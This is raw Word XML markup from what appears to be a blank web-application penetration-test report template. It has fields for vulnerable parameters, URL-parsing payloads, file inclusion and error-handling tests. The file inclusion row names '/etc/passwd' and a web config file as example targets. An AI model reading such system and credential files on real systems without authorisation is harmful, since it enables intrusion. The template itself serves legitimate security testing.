          <w:p w14:paraId="3ED5A489" w14:textId="3FA1CA28" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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81541E" w:rsidRPr="0081541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GET, POST, Headers, Cookies – Yes/No, List of Identified Vulnerable Parameters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515EB0C" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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4E6E594" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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C4F96" w:rsidRPr="00DB0B95" w14:paraId="4224EEB4" w14:textId="77777777" w:rsidTr="00D44229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2608BB0F" w14:textId="6169E472" w:rsidR="005C4F96" w:rsidRPr="00273535" w:rsidRDefault="00FD05A2" w:rsidP="00D4422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D05A2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Manipulated URL Parsing?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FCF808" w14:textId="7253232F" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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FD05A2" w:rsidRPr="00FD05A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Successful Payloads with @, #,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EC40C9D" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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D05A2" w:rsidRPr="00DB0B95" w14:paraId="53C20DB1" w14:textId="77777777" w:rsidTr="00D44229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04E6F996" w14:textId="2212F3DF" w:rsidR="00FD05A2" w:rsidRPr="00FD05A2" w:rsidRDefault="00FD05A2" w:rsidP="00D4422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D05A2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>File Inclusion Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C01951C" w14:textId="7450FA81" w:rsidR="00FD05A2" w:rsidRDefault="00FD05A2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FD05A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Examples: /etc/passwd, /var/www/html/config.php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5C4F96" w:rsidRPr="00DB0B95" w14:paraId="2C2015F5" w14:textId="77777777" w:rsidTr="00D44229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1DE6390C" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F96" w:rsidP="00D4422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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24274A0B" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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25042D1" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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C4F96" w:rsidRPr="00DB0B95" w14:paraId="68F4FDA4" w14:textId="77777777" w:rsidTr="00D44229">
        <w:trPr>
          <w:trHeight w:val="1070"/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65F71D29" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00BC63D1" w:rsidRDefault="005C4F96" w:rsidP="00D4422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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5426A0D5" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00FF267C" w:rsidRDefault="005C4F96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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w14:paraId="765F97CB" w14:textId="77777777" w:rsidTr="00D44229">
        <w:trPr>
          <w:trHeight w:val="1070"/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19B37CDC" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C9B634" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="58827CF0" w14:textId="77777777" w:rsidTr="00D44229">
        <w:trPr>
          <w:trHeight w:val="800"/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4C4F3BB5" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F96" w:rsidP="00D4422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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B27D6D" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="6A9372DF" w14:textId="77777777" w:rsidTr="00D44229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20FFE1D3" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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0B95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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13871EF1" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="177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1BABB5F" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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3B311B7" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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7BB6A06" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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BDF727F" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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63857F6" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="7AF7D995" w14:textId="77777777" w:rsidTr="00D44229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35AAD49E" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75AB71AF" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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D3540EF" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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F08DC21" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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1F1A684" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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E8E0F91" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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4330D33A" w14:textId="7FAE56C5" w:rsidR="00894C90" w:rsidRDefault="00894C90" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E43C75D" w14:textId="77777777" w:rsidR="00894C90" w:rsidRDefault="00894C90">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93B366" w14:textId="62117535" w:rsidR="00ED592C" w:rsidRDefault="00ED592C" w:rsidP="00ED592C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED592C">
        <w:lastRenderedPageBreak/>
        <w:t>Test 9: Exploit Improper Error Handling Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F4C5F" w14:textId="6AF8451A" w:rsidR="00894C90" w:rsidRPr="00894C90" w:rsidRDefault="00894C90" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00894C90">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[*This section </w:t>
      </w:r>
      <w:r w:rsidR="00195F38">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>includes techniques for</w:t>
      </w:r>
      <w:r w:rsidRPr="00894C90">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> testing errors through invalid inputs, malformed requests, and unexpected user actions</w:t>
      </w:r>
      <w:r w:rsidR="00A66E95">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00894C90">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22380BD6" w14:textId="77777777" w:rsidR="00894C90" w:rsidRDefault="00894C90" w:rsidP="000947B4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BA25C6" w:rsidRPr="00A51A96" w14:paraId="7DAE75F0" w14:textId="77777777" w:rsidTr="00195F38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="10252FFB" w14:textId="7185797A" w:rsidR="00BA25C6" w:rsidRPr="003C713F" w:rsidRDefault="00BA25C6" w:rsidP="00972D9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9.1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894C90">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploit Improper Error Handling Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="232746AF" w14:textId="77777777" w:rsidR="00894C90" w:rsidRPr="00195F38" w:rsidRDefault="00894C90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5"/>
        <w:gridCol w:w="6755"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w14:paraId="408C4F4D" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="284588C8" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00195F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A25C6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755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E9D387A" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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A25C6" w:rsidRPr="00BA25C6" w14:paraId="15A3726C" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61CB128A" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00195F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A25C6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755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4693229B" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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A25C6" w:rsidRPr="00BA25C6" w14:paraId="3DBBEDE7" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A69521B" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00195F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A25C6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755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757FAA7A" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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A25C6" w:rsidRPr="00BA25C6" w14:paraId="2B7BA2BE" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DA279D4" w14:textId="15E67A6A" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00FF5648" w:rsidP="00195F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F5648">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Triggered Errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D289BBA" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="178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9EADCA6" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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21FC157" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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7491C2B" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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ACA774F" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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44FFBCD" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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F5648" w:rsidRPr="00BA25C6" w14:paraId="18C0C3D0" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="448F2B8C" w14:textId="394C05B3" w:rsidR="00FF5648" w:rsidRPr="00FF5648" w:rsidRDefault="00FF5648" w:rsidP="00195F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F5648">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Observed HTTP Status Codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60972BE4" w14:textId="77777777" w:rsidR="00FF5648" w:rsidRDefault="00FF5648" w:rsidP="00FF564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F564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[*404, 403, 500, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF1D564" w14:textId="77777777" w:rsidR="00FF5648" w:rsidRDefault="00FF5648" w:rsidP="00FF564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3867845" w14:textId="519862C2" w:rsidR="00FF5648" w:rsidRPr="00FF5648" w:rsidRDefault="00FF5648" w:rsidP="00FF564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461703" w:rsidRPr="00BA25C6" w14:paraId="1E32E8BA" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3778F0D9" w14:textId="7D1C19DE" w:rsidR="00461703" w:rsidRPr="00FF5648" w:rsidRDefault="00461703" w:rsidP="00195F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61703">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Exposed Error Messages Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4337EDE5" w14:textId="77777777" w:rsidR="00461703" w:rsidRDefault="00461703" w:rsidP="00FF564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46170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Examples if found: Stack Traces, API Exceptions, Database Errors,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206FAF6" w14:textId="77777777" w:rsidR="00461703" w:rsidRDefault="00461703" w:rsidP="00FF564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5BC91D2" w14:textId="243FA8B8" w:rsidR="00461703" w:rsidRPr="00FF5648" w:rsidRDefault="00461703" w:rsidP="00FF564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8B05E5" w:rsidRPr="00BA25C6" w14:paraId="47F59EE4" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C325803" w14:textId="1EA2F53E" w:rsidR="008B05E5" w:rsidRPr="00461703" w:rsidRDefault="008B05E5" w:rsidP="00195F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B05E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application Frameworks &amp; Services Disclosed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="671E5BF5" w14:textId="77777777" w:rsidR="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00FF564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8B05E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Identified Technologies if found: .NET, Flask, Django,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267174D" w14:textId="41A33C21" w:rsidR="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00FF564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8B05E5" w:rsidRPr="00BA25C6" w14:paraId="22D6360D" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D19E4C4" w14:textId="6EEAB87F" w:rsidR="008B05E5" w:rsidRPr="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00195F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8B05E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server-Specific Errors Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD49962" w14:textId="77777777" w:rsidR="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00FF564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8B05E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Server Type &amp; Version Disclosed: Apache, Nginx, IIS,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6EE8266" w14:textId="77777777" w:rsidR="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00FF564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56A1C8E" w14:textId="366C99BC" w:rsidR="008B05E5" w:rsidRDefault="008B05E5" w:rsidP="00FF564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736C0" w:rsidRPr="00BA25C6" w14:paraId="727C9145" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0D3809" w14:textId="4975B73D" w:rsidR="00B736C0" w:rsidRPr="008B05E5" w:rsidRDefault="00B736C0" w:rsidP="00195F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736C0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Fuzz Testing Performed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="547B4666" w14:textId="77777777" w:rsidR="00B736C0" w:rsidRDefault="00B736C0" w:rsidP="00FF564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B736C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Results from Unexpected Inputs: Malformed JSON, Special Characters, Oversized Payloads,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577F582" w14:textId="77777777" w:rsidR="00B736C0" w:rsidRDefault="00B736C0" w:rsidP="00FF564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635161B" w14:textId="77777777" w:rsidR="00B736C0" w:rsidRDefault="00B736C0" w:rsidP="00FF564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92B7035" w14:textId="75FE4EC3" w:rsidR="00B736C0" w:rsidRDefault="00B736C0" w:rsidP="00FF564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A25C6" w:rsidRPr="00BA25C6" w14:paraId="42BC9A39" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="411F2080" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00195F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A25C6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Vulnerabilities Identified from Error Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="622EA14B" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="179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1EEAF6F" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="179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CCD1276" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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24A0A3D" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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D77AA09" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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2C32057" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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A25C6" w:rsidRPr="00BA25C6" w14:paraId="2F842EA9" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="587556D8" w14:textId="15A17F94" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00425D1B" w:rsidP="00195F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Additional </w:t>
            </w:r>
            <w:r w:rsidR="00BA25C6" w:rsidRPr="00BA25C6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Information Gathered about Application Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A93C8A" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00425D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A25C6" w:rsidRPr="00BA25C6" w14:paraId="335DE7B0" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CFEC988" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00195F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A25C6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755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="558652D4" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="180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D246290" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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7E5F619" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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C1ED101" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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5450ED8" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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5575B7E" w14:textId="77777777" w:rsidR="00BA25C6" w:rsidRPr="00BA25C6" w:rsidRDefault="00BA25C6" w:rsidP="00BA25C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25D1B" w:rsidRPr="00BA25C6" w14:paraId="4460FBE6" w14:textId="77777777" w:rsidTr="00195F38">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605" w:type="dxa"/>
